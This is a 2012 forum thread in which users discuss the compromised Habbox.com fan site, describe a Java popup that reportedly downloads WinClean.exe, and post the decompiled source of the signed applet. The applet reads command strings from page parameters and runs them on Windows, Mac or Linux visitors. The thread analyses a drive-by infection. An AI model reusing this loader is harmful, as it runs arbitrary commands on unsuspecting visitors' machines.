Habbox DOT com ~ Site

**GoldenMerc** · 04-06-2012, 03:47 PM

AVG most likely blocked it for you, the site's not very interesting to be fair. no pages work

tried going through them all

Logandyer45 · 04-06-2012, 03:49 PM

I tried looking at the events. I need to know if there is any events going on.

**GoldenMerc** · 04-06-2012, 03:50 PM

Yeh that's defiantly not possible as the habbox.com domain is messed atm, well is for my provider may not be for yours

xxMATTGxx · 04-06-2012, 03:51 PM

Originally Posted by Logandyer45

I tried looking at the events. I need to know if there is any events going on.

It would be best to look at the community notice board in regards of events!

Chippiewill · 04-06-2012, 03:51 PM

It's actually pretty easy to get on the main site if you really need it for some reason http://146.185.20.107/#!/Home

**Stephen** · 04-06-2012, 05:18 PM

whoever it is his name is phil

Samantha · 04-06-2012, 05:26 PM

Originally Posted by Stephen!

whoever it is his name is phil

@Dilusionate; what you been doing to Habbox?

**Recursion** · 04-06-2012, 05:31 PM

I've been looking into the Java popup used on their site.

It uses a Java exploit to run some code on your machine to create a VBS file (a Visual Basic Scripting file) that downloads a program called WinClean.exe which then has a child of WinRarC.exe, I'm not entirely sure what the exe's are doing, but am looking into it still.

Hecktix · 04-06-2012, 05:38 PM

A further problem made 10x worse by Habbox's owners being inactive, how many times to people need to say it GIVE xxMATTGxx ACCESS TO THE LOT.

Tomm · 04-06-2012, 05:47 PM

There is no java exploit. Here is the decompiled code:

Code:

import java.applet.Applet;
import java.io.IOException;


public class Client extends Applet
{
  public void init()
  {
    String window1 = getParameter("windows1");
    String windows2 = getParameter("windows2");
    String linux1 = getParameter("linux1");
    String linux2 = getParameter("linux2");
    String unix1 = getParameter("unix1");
    String unix2 = getParameter("unix2");
    String os = System.getProperty("os.name").toLowerCase();


    if (os.indexOf("win") >= 0)
    {
      try
      {
        Process w1 = Runtime.getRuntime().exec(window1);
        w2 = Runtime.getRuntime().exec(windows2);
      }
      catch (IOException e)
      {
        Process w2;
        e.printStackTrace();
      }


    }


    if (os.indexOf("mac") >= 0)
    {
      try
      {
        Process u1 = Runtime.getRuntime().exec(unix1);
        u2 = Runtime.getRuntime().exec(unix2);
      }
      catch (IOException e)
      {
        Process u2;
        e.printStackTrace();
      }


    }


    if (os.indexOf("lin") < 0) {
      return;
    }
    try
    {
      Process l1 = Runtime.getRuntime().exec(linux1);
      l2 = Runtime.getRuntime().exec(linux2);
    }
    catch (IOException e)
    {
      Process l2;
      e.printStackTrace();
    }
  }
}

Signed Java applets (which this one is) are not run in the normal sandbox and can do what they like.

Originally Posted by Recursion

I've been looking into the Java popup used on their site.

It uses a Java exploit to run some code on your machine to create a VBS file (a Visual Basic Scripting file) that downloads a program called WinClean.exe which then has a child of WinRarC.exe, I'm not entirely sure what the exe's are doing, but am looking into it still.

Thread: Habbox DOT com ~ Site

Thread Tools

Posting Permissions